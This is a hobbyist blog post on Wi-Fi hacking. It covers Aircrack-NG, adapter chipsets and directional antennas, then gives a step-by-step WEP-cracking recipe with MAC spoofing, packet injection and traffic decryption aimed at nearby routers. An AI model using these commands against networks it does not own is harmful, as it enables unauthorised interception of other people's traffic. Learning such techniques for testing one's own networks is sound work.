I thought why not shed some light on the tools that I have been using to play with the Wi-Fi networks around me. Hopefully, we can get gather a collective discussion on what works and what do not and perhaps interesting ideas for future Wi-Fi projects.
Max and I have been toying with 802.11 networks since early this year, we have tested and tried a number of antennas, network adaptors and certain methods to “crack” WEP and WPA. The objective is to decipher and read data that is up in the air.
For starters, here is a set of software / tools that I used.
OS: Backtrack 4, Ubuntu 10.04.
Tools: Aircrack-NG suite, Wireshark and WiFiZoo
Wireshark and WiFiZoo are basically network packet analysers that help you make sense out of stream of data that is being fed to you on a real time basis. Both have great GUI so I do not foresee any potential problems with regards to using it. Plus it comes pre-installed in Backtrack 4. What one should look out for is mastering the Aircrack-NG suite. What you need to know is that it ONLY works fully with certain Wi-Fi cards. There are certain Wi-Fi cards that will not get detected by the Aircrack-NG suite while others will have only partial functions available (common example would be able to passively collect data only and not inject packets into the air). What you need to do is to MAKE SURE you get a proper Wi-Fi adaptor card with the correct chipset before you begin cracking or sniffing. You can get the supported list of the cards and chipsets here.
Adaptors & Antennas
This brings us to the fun part of Adaptors and Antennas, perhaps also the hardest and most rewarding part of all. To cut a long story short on the numerous hair tearing sessions we had to go through finding the “Chosen One”, Max and I finally arrived at two commercially available adaptors that work perfectly with the Aircrack-NG suite. They are as follows:
The reason for these two is simple, its chipset (RTL8187L) is supported and it is cost effective for their given specifications. The only difference between the two lies within the antenna, the AWUS036H comes with an omni-directional antenna while the UBDo-gt comes with a directional antenna of 12 dBi gain.
There is significance in application when choosing between an omni-directional and a directional antenna. One would use an Omni-directional antenna first when doing reconnaissance on the networks around the vicinity and then a directional antenna to lock-on your target, you can now move away further from your target without compromising signal strength and quality once you know where to point to your target.
Unfortunately, directional antennas do not come cheap. Take the UBDo-gt for an example, because of the antenna it costs about 30–40 SGD more than the AWUS036H and standalone external antennas costs up to 70-90 SGD for about the same 12 dBi gain. The good news if that making your own antenna can be really cheap and simple. I have made a Cantenna on my own using a “Longan Fruit” Can and it gives me about 8 – 12 dBi gain. I relied on this website to do the calculations I needed to build my Cantenna.
Basic steps to get you cracking WEP (for ScriptKiddies)
Once you got your tools ready it is time to get cracking. Routers especially those given out by our local ISP have their default security settings set to WEP to encrypt their traffic. This can be easily cracked by Aircrack-NG suite in about 5 minutes once you are “au fait” with the setup.
For those who want to jump straight into the cracking process here are the basic steps you need to take:
Step 0: Spoof MAC address
sudo ifconfig < attacker’s wlan interface > hw ether <desired MAC address>
Step 1: Gather essential background data about yourself and your target.
target_router SSID -> target_router
target_router MAC address -> 00:14:7F:99:EB:99
target router channel-> 6
attacker’s MAC address -> 00:0f:b5:ff:ff:f9
attacker’s wlan interface: wlan0
attacker’s monitoring interface name (spawned from wlan0): mon0
Note: Replace the above variables with your own. These were mine for my setup.
Step 2: Using Aircrack-NG suite to crack WEP
sudo airmon-ng start wlan0 -> spawn a monitoring interface from wlan0.
sudo airodump-ng mon0 -> survey / scan for your target router.
sudo airmon-ng stop mon0 -> stop the monitoring interface so that you can start it again to listen on channel 6.
sudo airmon-ng start wlan0 6 -> This starts the mon0 interface listening to only channel 6 [Important step!].
sudo airodump-ng -c6 -w outputfile mon0 -> pump output to a file called outputfile-01.cap.
sudo aireplay-ng -1 1 -e target_router -a 00:14:7F:99:EB:99 -h 00:0f:b5:ff:ff:f9 mon0 -> This creates a single fakeauth request for every 1 second to generate more IV. [open in separate terminal]
sudo aireplay-ng -3 -b 00:14:7F:99:EB:99 -h 00:0f:b5:ff:ff:f9 mon0 -> Launch as many of these ARP replay to generate IV packets quickly. [Open in separate terminal]
sudo aircrack-ng outputfile-01.cap
Step 3 (Optional): Monitor network traffic in real time
Open up Wireshark > Edit > Preferences > Enter WEP key into the appropriate fields
Disclaimer: Unauthorised access to your neighbours’ network or any other network other than your own is an offence in Singapore. Crack at your own risk!
Finally, experiment as much as you can without getting into trouble with the law because it is a fun process and it need not be a painful one. Please comment and leave your thoughts below. Let us know if you have a Wi-Fi project in mind that you want to try out or you want to share too. I look forward to your response.